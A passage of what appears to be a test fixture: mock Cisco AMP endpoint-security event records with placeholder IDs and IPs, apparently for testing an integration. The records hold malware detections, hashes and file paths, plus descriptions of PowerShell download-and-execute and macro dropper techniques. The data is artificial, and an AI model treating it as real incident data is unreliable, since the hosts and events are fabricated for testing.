IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. 
In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application 
Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vuln
Id=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application 